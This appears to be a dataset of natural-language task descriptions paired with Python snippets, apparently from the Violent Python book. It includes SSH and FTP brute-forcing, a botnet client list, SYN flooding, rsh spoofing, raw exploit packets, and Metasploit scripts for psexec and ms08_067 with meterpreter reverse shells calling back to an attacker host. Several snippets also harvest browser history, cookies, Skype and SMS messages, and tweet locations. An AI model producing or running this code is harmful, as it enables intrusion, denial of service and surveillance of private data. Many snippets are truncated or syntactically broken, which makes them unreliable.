stringlengths 20
| Script
stringlengths 85
Scan the tgtHost on tgtPort with nmap and calculate the state | def nmapScan(tgtHost,tgtPort): \n nmScan = nmap.PortScanner() \n nmScan.scan(tgtHost,tgtPort) \n state=nmScan[tgtHost]['tcp'][int(tgtPort)]['state' \n
Define the function addClient with arguments host, user and password then Call the class Client with argumet host, user and password and assign it to client then Call the method append on botNet with argument client | def addClient(host, user, password): \ n client = Client(host, user, password) \n botNet.append(client)
Given an url get the html code | def viewPage(url): \n browser = mechanize.Browser() \n page = \n source_code = \n
Scan the subnet for the open port 445, then for each host if the port is open append it to a list and return it | def findTgts(subNet): \n nmScan = nmap.PortScanner() \n nmScan.scan(subNet, '445') \n tgtHosts = [] \n for host in nmScan.all_hosts(): \n if nmScan[host].has_tcp(445): \n state = nmScan[host]['tcp'][445]['state'] \n if state == 'open': \n tgtHosts.append(host) \n return tgtHosts \n
Given an url look for any other url inside the page | def printLinks(url): \n \n ab = anonBrowser() \n ab.anonymize() \n page = \n html = \n \n try: \n link_finder = re.compile('href="(.*?)"') \n links = link_finder.findall(html) \n for link in links: \n pass \n except: \n pass \n \n try: \n soup = BeautifulSoup(html) \n links = soup.findAll(name='a') \n for link in links: \n if link.has_key('href'): \n pass \n except: \n pass \n
Given an url and a userAgent address get the html code through that userAgent | def testUserAgent(url, userAgent): \n browser = mechanize.Browser() \n browser.addheaders = userAgent \n page = \n source_code = \n
Connect with protocol ssx | def connect(self): \n try: \n s = pxssh.pxssh() \n s.login(, self.user, self.password) \n return s \n
Given an url get the html code and the cookies | def printCookies(url): \n browser = mechanize.Browser() \n cookie_jar = cookielib.LWPCookieJar() \n browser.set_cookiejar(cookie_jar) \n page = \n for cookie in cookie_jar: \n pass \n
Connect to placesDB database and execute the command "select url, datetime(visit_date/1000000, 'unixepoch') from moz_places, moz_historyvisits where visit_count > 0 and;" | def printHistory(placesDB): \n try: \n conn = sqlite3.connect(placesDB) \n c = conn.cursor() \n c.execute("select url, datetime(visit_date/1000000, 'unixepoch') from moz_places, moz_historyvisits where visit_count > 0 and;") \n \n for row in c: \n url = str(row[0]) \n date = str(row[1]) \n except Exception, e: \n if 'encrypted' in str(e): \n exit(0) \n
Given a src, tgt and ack send syn and ack packets to tgt with source port 513 and destination port 514 | def spoofConn(src, tgt, ack): \n IPlayer = IP(src=src, dst=tgt) \n TCPlayer = TCP(sport=513, dport=514) \n synPkt = IPlayer / TCPlayer \n send(synPkt) \n \n IPlayer = IP(src=src, dst=tgt) \n TCPlayer = TCP(sport=513, dport=514, ack=ack) \n ackPkt = IPlayer / TCPlayer \n send(ackPkt) \n
Find download URIs given a pcap file | def findDownload(pcap): \n for (ts, buf) in pcap: \n try: \n eth = dpkt.ethernet.Ethernet(buf) \n ip = \n src = socket.inet_ntoa(ip.src) \n tcp = \n http = dpkt.http.Request( \n if http.method == 'GET': \n uri = http.uri.lower() \n if '.zip' in uri and 'loic' in uri: \n pass \n except: \n pass \n
Connect to downloadDB database and execute the command 'SELECT host, name, value FROM moz_cookies' | def printCookies(cookiesDB): \n try: \n conn = sqlite3.connect(cookiesDB) \n c = conn.cursor() \n c.execute('SELECT host, name, value FROM moz_cookies') \n \n for row in c: \n host = str(row[0]) \n name = str(row[1]) \n value = str(row[2] \n
Given a search_term, get the list of urls from the ajax google api | def google(search_term): \n ab = anonBrowser() \n \n search_term = urllib.quote_plus(search_term) \n response =''+ 'ajax/services/search/web?v=1.0&q='+ search_term) \n objects = json.load(response) \n results = [] \n \n for result in objects['responseData']['results']: \n url = result['url'] \n title = result['titleNoFormatting'] \n text = result['content'] \n new_gr = Google_Result(title, text, url) \n results.append(new_gr) \n return results \n
Given a string, search it on google ajax apis and return a json | def google(search_term): \n ab = anonBrowser() \n \n search_term = urllib.quote_plus(search_term) \n response =''+ 'ajax/services/search/web?v=1.0&q='+ search_term) \n objects = json.load(response) \n
Given a string, make a google research with the ajax apis and get the response | def google(search_term): \n ab = anonBrowser() \n \n search_term = urllib.quote_plus(search_term) \n response =''+ 'ajax/services/search/web?v=1.0&q='+ search_term) \n
Define the function __init__ with arguments self and handle, assign to handle of self handle and assign to tweets of self the result of the method get_tweets with no argument of self | def __init__(self, handle): \n self.handle = handle \n self.tweets = self.get_tweets() \n
Get a list of tweet given an handle | def get_tweets(self): \n query = urllib.quote_plus('from:' + self.handle+ ' since:2009-01-01 include:retweets') \n tweets = [] \n browser = anonBrowser() \n browser.anonymize() \n response =''+ 'search.json?q=' + query) \n \n json_objects = json.load(response) \n for result in json_objects['results']: \n new_result = {} \n new_result['from_user'] = result['from_user_name'] \n new_result['geo'] = result['geo'] \n new_result['tweet'] = result['text'] \n tweets.append(new_result) \n return tweets \n
For each tweet find the links, the users and the hashtags associated | def find_interests(self): \n interests = {} \n interests['links'] = [] \n interests['users'] = [] \n interests['hashtags'] = [] \n \n for tweet in self.tweets: \n text = tweet['tweet'] \n links = re.compile('(http.*?)\Z|(http.*?) ').findall(text) \n \n for link in links: \n if link[0]: \n link = link[0] \n elif link[1]: \n link = link[1] \n else: \n continue \n \n try: \n response = urllib2.urlopen(link) \n full_link = response.url \n interests['links'].append(full_link) \n except: \n pass \n interests['users'] += re.compile('(@\w+)').findall(text) \n interests['hashtags'] += re.compile('(#\w+)').findall(text) \n \n interests['users'].sort() \n interests['hashtags'].sort() \n interests['links'].sort() \n return interests \n
Given the file cityFile with a city in each line return the tweets that contain that city | def twitter_locate(self, cityFile): \n cities = [] \n if cityFile != None: \n for line in open(cityFile).readlines(): \n city = line.strip('\n').strip('\r').lower() \n cities.append(city) \n \n locations = [] \n locCnt = 0 \n cityCnt = 0 \n tweetsText = '' \n \n for tweet in self.tweets: \n if tweet['geo'] != None: \n locations.append(tweet['geo']) \n locCnt += 1 \n \n tweetsText += tweet['tweet'].lower() \n \n for city in cities: \n if city in tweetsText: \n locations.append(city) \n cityCnt += 1 \n \n return locations \n
Given cityFile, open the file and return a list of city stripped of '\n' and '\r' in lower case | def load_cities(cityFile): \n cities = [] \n for line in open(cityFile).readlines(): \n city=line.strip('\n').strip('\r').lower() \n cities.append(city) \n return cities \n
Given a list of tweets and a list of cities associate the city to the geo location of the tweet | def twitter_locate(tweets,cities): \n locations = [] \n locCnt = 0 \n cityCnt = 0 \n tweetsText = "" \n \n for tweet in tweets: \n if tweet['geo'] != None: \n locations.append(tweet['geo']) \n locCnt += 1 \n \n tweetsText += tweet['tweet'].lower() \n \n for city in cities: \n if city in tweetsText: \n locations.append(city) \n cityCnt+=1 \n return locations \n
Given an handle get who wrote, the location and tweet through an anonymous browser | def get_tweets(handle): \n query = urllib.quote_plus('from:' + handle+ ' since:2009-01-01 include:retweets') \n tweets = [] \n browser = anonBrowser() \n browser.anonymize() \n \n response =''+ 'search.json?q='+ query) \n \n json_objects = json.load(response) \n for result in json_objects['results']: \n new_result = {} \n new_result['from_user'] = result['from_user_name'] \n new_result['geo'] = result['geo'] \n new_result['tweet'] = result['text'] \n tweets.append(new_result) \n \n return tweets \n
Assign self,first_name,last_name, job and social_media= to self | def __init__(self,first_name,last_name, job='',social_media={}): \n self.first_name = first_name \n self.last_name = last_name \n self.job = job \n self.social_media = social_media \n
Define the method __repr__ with argument self and return the concatenation of first_name of self, ' ', last_name of self + ' has job ' + job of self | def __repr__(self): \n return self.first_name + ' ' + self.last_name + ' has job ' + self.job \n
Return the variable social_media with key media_nameof self if it exists | def get_social(self, media_name): \n if self.social_media.has_key(media_name): \n return self.social_media[media_name] \n
Given a query return a list of tweets composed of the author, the geolocalization and the text in the tweet | def query_twitter(self, query): \n query = urllib.quote_plus(query) \n results = [] \n browser = anonBrowser() \n response = ''+ query) \n json_objects = json.load(response) \n for result in json_objects['results']: \n new_result = {} \n new_result['from_user'] = result['from_user_name'] \n new_result['geo'] = result['geo'] \n new_result['tweet'] = result['text'] \n results.append(new_result) \n
Given an user, pwd, to, subject and text try to send an email | def sendMail(user,pwd,to,subject,text): \n \n msg = MIMEText(text) \n msg['From'] = user \n msg['To'] = to \n msg['Subject'] = subject \n \n try: \n smtpServer = smtplib.SMTP('', 587) \n smtpServer.ehlo() \n smtpServer.starttls() \n smtpServer.ehlo() \n smtpServer.login(user, pwd) \n smtpServer.sendmail(user, to, msg.as_string()) \n smtpServer.close() \n \n except: \n pass \n
Define the method __init__ with arguments self, title, text and url, assign to title of self the value title, assign to text of self the value text and assign to text of self the value text | def __init__(self,title,text,url): \n self.title = title \n self.text = text \n self.url = url \n
Define the function send_command with arguments child and cmd, call method sendline with argument cmd of child and call method expect with argument PROMPT of child | def send_command(child, cmd): \n child.sendline(cmd) \n child.expect(PROMPT)
Send a packet pkt with source src, destination dst, UDP with destination port equals to 518 and the load equals to "\x01\x03\x00\x00\x00\x00\x00\x01\x00\x02\x02\xE8" and send a packet pkt with source src, destination dst, UDP with destination port equals to 635 and the load equals to "^\xB0\x02\x89\x06\xFE\xC8\x89F\x04\xB0\x06\x89F" | def exploitTest(src, dst, iface, count): \n \n pkt = IP(src=src, dst=dst) / UDP(dport=518) /Raw(load="\x01\x03\x00\x00\x00\x00\x00\x01\x00\x02\x02\xE8") \n send(pkt, iface=iface, count=count) \n \n pkt = IP(src=src, dst=dst) / UDP(dport=635) /Raw(load="^\xB0\x02\x89\x06\xFE\xC8\x89F\x04\xB0\x06\x89F") \n send(pkt, iface=iface, count=count \n
For each password in the file pF remove the '\n' and '\r' then write in the file: 'use exploit/windows/smb/psexec\n', 'set SMBUser ' + str(username) + '\n', 'set SMBPass ' + str(password) + '\n', 'set RHOST ' + str(tgtHost) + '\n', 'set payload '+'windows/meterpreter/reverse_tcp\n', 'set LPORT ' + str(lport) + '\n' and 'set LHOST ' + lhost + '\n' and 'exploit -j -z\n' | def smbBrute(configFile,tgtHost,passwdFile,lhost,lport): \n username = 'Administrator' \n pF = open(passwdFile, 'r') \n for password in pF.readlines(): \n password = password.strip('\n').strip('\r') \n configFile.write('use exploit/windows/smb/psexec\n') \n configFile.write('set SMBUser ' + str(username) + '\n') \n configFile.write('set SMBPass ' + str(password) + '\n') \n configFile.write('set RHOST ' + str(tgtHost) + '\n') \n configFile.write('set payload '+\ \n 'windows/meterpreter/reverse_tcp\n') \n configFile.write('set LPORT ' + str(lport) + '\n') \n configFile.write('set LHOST ' + lhost + '\n') \n configFile.write('exploit -j -z\n') \n
Write a configFile with the lines: 'use exploit/multi/handler\n', 'set payload '+'windows/meterpreter/reverse_tcp\n', 'set LPORT ' + str(lport) + '\n', 'set LHOST ' + lhost + '\n', 'exploit -j -z\n' and 'setg DisablePayloadHandler 1\n' | def setupHandler(configFile, lhost, lport): \n configFile.write('use exploit/multi/handler\n') \n configFile.write('set payload '+\ \n 'windows/meterpreter/reverse_tcp\n') \n configFile.write('set LPORT ' + str(lport) + '\n') \n configFile.write('set LHOST ' + lhost + '\n') \n configFile.write('exploit -j -z\n') \n configFile.write('setg DisablePayloadHandler 1\n') \n
Costruct the class with host, user and password, then connect | def __init__(self, host, user, password): \n = host \n self.user = user \n self.password = password \n self.session = self.connect() \n
Flood a tgt with syn requests given a src for each source port from 1024 to 65535 | def synFlood(src, tgt): \n for sport in range(1024,65535): \n IPlayer = IP(src=src, dst=tgt) \n TCPlayer = TCP(sport=sport, dport=513) \n pkt = IPlayer / TCPlayer \n send(pkt) \n
Connect to downloadDB database and execute the command 'SELECT name, source, datetime(endTime/1000000,\'unixepoch\') FROM moz_downloads;' | def printDownloads(downloadDB): \n conn = sqlite3.connect(downloadDB) \n c = conn.cursor() \n c.execute('SELECT name, source, datetime(endTime/1000000,\'unixepoch\') FROM moz_downloads;' \n
Check if the images contain Exif data, if it does then for each tuple tag and value in it decode it | def testForExif(imgFileName): \n try: \n exifData = {} \n imgFile = \n info = imgFile._getexif() \n if info: \n for (tag, value) in info.items(): \n decoded = TAGS.get(tag, tag) \n exifData[decoded] = value \n exifGPS = exifData['GPSInfo'] \n except: \n pass \n
Get the default pages from a FTP connection with the command nlst, return if failed else for each page return the one that contains .php .htm or .asp | def returnDefault(ftp): \n try: \n dirList = ftp.nlst() \n except: \n dirList = [] \n return \n \n retList = [] \n for fileName in dirList: \n fn = fileName.lower() \n if '.php' in fn or '.htm' in fn or '.asp' in fn: \n retList.append(fileName) \n return retList \n
Connect to the database iphoneDB, run the command 'SELECT tbl_name FROM sqlite_master WHERE type==\"table\";', return True if you find the substring 'message', False if you find an error | def isMessageTable(iphoneDB): \n try: \n conn = sqlite3.connect(iphoneDB) \n c = conn.cursor() \n c.execute('SELECT tbl_name FROM sqlite_master WHERE type==\"table\";') \n for row in c: \n if 'message' in str(row): \n return True \n except: \n return False \n
Given a pcap get in tcp data the number of entries composed of ip source, ':', ip destination with destination port 80 | def findAttack(pcap): \n pktCount = {} \n for (ts, buf) in pcap: \n try: \n eth = dpkt.ethernet.Ethernet(buf) \n ip = \n src = socket.inet_ntoa(ip.src) \n dst = socket.inet_ntoa(ip.dst) \n tcp = \n dport = tcp.dport \n if dport == 80: \n stream = src + ':' + dst \n if pktCount.has_key(stream): \n pktCount[stream] = pktCount[stream] + 1 \n else: \n pktCount[stream] = 1 \n except: \n pass \n
Attempt to connect with user to the host with a keyfile and check if connection must be released | def connect(user,host,keyfile,release): \n global Stop \n global Fails \n try: \n perm_denied = 'Permission denied' \n ssh_newkey = 'Are you sure you want to continue' \n conn_closed = 'Connection closed by remote host' \n opt = ' -o PasswordAuthentication=no' \n connStr = 'ssh ' + user +\ \n '@' + host + ' -i ' + keyfile + opt \n child = pexpect.spawn(connStr) \n ret = child.expect([pexpect.TIMEOUT,perm_denied,ssh_newkey,conn_closed,'$','#',]) \n if ret == 2: \n child.sendline('yes') \n connect(user, host, keyfile, False) \n elif ret == 3: \n Fails += 1 \n elif ret > 3: \n Stop = True \n finally: \n if release: \n connection_lock.release() \n
Given an url and a dir save in a dir every image found on the url | def mirrorImages(url, dir): \n ab = anonBrowser() \n ab.anonymize() \n html = \n soup = BeautifulSoup(html) \n image_tags = soup.findAll('img') \n \n for image in image_tags: \n filename = image['src'].lstrip('http://') \n filename = os.path.join(dir,filename.replace('/', '_')) \n data =['src']).read() \n ab.back() \n save = open(filename, 'wb') \n save.write(data) \n save.close() \n
Attempt a brute force connection with an hostname and a file containing the username and the password separated by : at each line every second. Return the tuple userName and password if successful | def bruteLogin(hostname, passwdFile): \n pF = open(passwdFile, 'r') \n for line in pF.readlines(): \n time.sleep(1) \n userName = line.split(':')[0] \n passWord = line.split(':')[1].strip('\r').strip('\n') \n try: \n ftp = ftplib.FTP(hostname) \n ftp.login(userName, passWord) \n ftp.quit() \n return (userName, passWord) \n except Exception, e: \n pass \n return (None, None) \n
Get Keyhole Markup Language given an ip | def retKML(ip): \n rec = gi.record_by_name(ip) \n try: \n longitude = rec['longitude'] \n latitude = rec['latitude'] \n kml = ( '<Placemark>\n', '<name>%s</name>\n', '<Point>\n', '<coordinates>%6f, %6f</coordinates>\n', '</Point>\n','</Placemark>\n') \n return kml \n except: \n return ' \n
Connect to the host with user and password with protocol ssh, exit if you cant insert the password or it is wrong | def connect(user, host, password): \n ssh_newkey = 'Are you sure you want to continue connecting' \n connStr = 'ssh ' + user + '@' + host \n child = pexpect.spawn(connStr) \n ret = child.expect([pexpect.TIMEOUT, ssh_newkey, '[P|p]assword:']) \n \n if ret == 0: \n return \n \n if ret == 1: \n child.sendline('yes') \n ret = child.expect([pexpect.TIMEOUT, \ \n '[P|p]assword:']) \n if ret == 0: \n return \n \n child.sendline(password) \n child.expect(PROMPT) \n return child \n
Find all the images from a url and return them | def findImages(url): \n urlContent = urllib2.urlopen(url).read() \n soup = BeautifulSoup(urlContent) \n imgTags = soup.findAll('img') \n return imgTags \n
Get the image from imgTag, download it into a file and return it | def downloadImage(imgTag): \n try: \n imgSrc = imgTag['src'] \n imgContent = urllib2.urlopen(imgSrc).read() \n imgFileName = basename(urlsplit(imgSrc)[2]) \n imgFile = open(imgFileName, 'wb') \n imgFile.write(imgContent) \n imgFile.close() \n return imgFileName \n except: \n return '' \n
Connect to placesDB database and execute the command "select url, datetime(visit_date/1000000, 'unixepoch') from moz_places, moz_historyvisits where visit_count > 0 and;". Find all google url in lower case, split for '&' and replace 'q=' and '+' | def printGoogle(placesDB): \n conn = sqlite3.connect(placesDB) \n c = conn.cursor() \n c.execute("select url, datetime(visit_date/1000000, 'unixepoch') from moz_places, moz_historyvisits where visit_count > 0 and;") \n for row in c: \n url = str(row[0]) \n date = str(row[1]) \n if 'google' in url.lower(): \n r = re.findall(r'q=.*\&', url) \n if r: \n search=r[0].split('&')[0] \n search=search.replace('q=', '').replace('+', ' ') \n
Connect to the database skypeDB and execute the command "SELECT datetime(timestamp,'unixepoch'),dialog_partner, author, body_xml FROM Messages;" then define if the messages are sent or received | def printMessages(skypeDB): \n conn = sqlite3.connect(skypeDB) \n c = conn.cursor() \n c.execute("SELECT datetime(timestamp,'unixepoch'),dialog_partner, author, body_xml FROM Messages;") \n \n for row in c: \n try: \n if 'partlist' not in str(row[3]): \n if str(row[1]) != str(row[2]): \n msgDirection = 'To ' + str(row[1]) + ': ' \n else: \n msgDirection = 'From ' + str(row[2]) + ' : ' \n except: \n pas \n
Attempt an anonymous connection with FTP protocol given an hostname. Return true if succesful False otherwise | def anonLogin(hostname): \n try: \n ftp = ftplib.FTP(hostname) \n ftp.login('anonymous', '') \n ftp.quit() \n return True \n except Exception, e: \n return False \n
Send the message ViolentPython\r\n on the host tgtHost on the port tgtPort | def connScan(tgtHost, tgtPort): \n try: \n connSkt = socket(AF_INET, SOCK_STREAM) \n connSkt.connect((tgtHost, tgtPort)) \n connSkt.send('ViolentPython\r\n') \n results = connSkt.recv(100) \n screenLock.acquire() \n except: \n screenLock.acquire() \n finally: \n screenLock.release() \n screenLock.close()
Send the command cmd | def send_command(self, cmd): \n self.session.sendline(cmd) \n self.session.prompt() \n return self.session.before \n
Connect to the database msgDB, run the command'select datetime(date,\'unixepoch\'),address, text from message WHERE address>0;', then get date, addr and text for each row | def printMessage(msgDB): \n try: \n conn = sqlite3.connect(msgDB) \n c = conn.cursor() \n c.execute('select datetime(date,\'unixepoch\'),address, text from message WHERE address>0;') \n for row in c: \n date = str(row[0]) \n addr = str(row[1]) \n text = row[2] \n except: \n pass \n
Connect to a host with user and password with the ssh protocol | def connect(host, user, password): \n try: \n s = pxssh.pxssh() \n s.login(host, user, password) \n return s \n except: \n exit(0) \n
For all entries in pcap get the source or the destination of the IP packet | def printPcap(pcap): \n for (ts, buf) in pcap: \n try: \n eth = dpkt.ethernet.Ethernet(buf) \n ip = \n src = socket.inet_ntoa(ip.src) \n dst = socket.inet_ntoa(ip.dst) \n except: \n pass \n
Given a pkt, extract the IP and test the time to live | def testTTL(pkt): \n try: \n if pkt.haslayer(IP): \n ipsrc = pkt.getlayer(IP).src \n ttl = str(pkt.ttl) \n checkTTL(ipsrc, ttl) \n except: \n pass \n
Get a string composed of country and city if it exists given an IP, except return 'Unregistered' | def retGeoStr(ip): \n try: \n rec = gi.record_by_name(ip) \n city = rec['city'] \n country = rec['country_code3'] \n if city != '': \n geoLoc = city + ', ' + country \n else: \n geoLoc = country \n return geoLoc \n except Exception, e: \n return 'Unregistered' \n
Write a configFile with the lines: 'use exploit/windows/smb/ms08_067_netapi\n', 'set RHOST ' + str(tgtHost) + '\n', 'set payload '+'windows/meterpreter/reverse_tcp\n', 'set LPORT ' + str(lport) + '\n', 'set LHOST ' + lhost + '\n' and 'exploit -j -z\n' | def confickerExploit(configFile,tgtHost,lhost,lport): \n configFile.write('use exploit/windows/smb/ms08_067_netapi\n') \n configFile.write('set RHOST ' + str(tgtHost) + '\n') \n configFile.write('set payload '+\ \n 'windows/meterpreter/reverse_tcp\n') \n configFile.write('set LPORT ' + str(lport) + '\n') \n configFile.write('set LHOST ' + lhost + '\n') \n configFile.write('exploit -j -z\n') \n
Connect to host with user and password with ssh protocol and stop after "release" failures | def connect(host, user, password, release): \n global Found \n global Fails \n \n try: \n s = pxssh.pxssh() \n s.login(host, user, password) \n Found = True \n except Exception, e: \n if 'read_nonblocking' in str(e): \n Fails += 1 \n time.sleep(5) \n connect(host, user, password, False) \n elif 'synchronize with original prompt' in str(e): \n time.sleep(1) \n connect(host, user, password, False) \n
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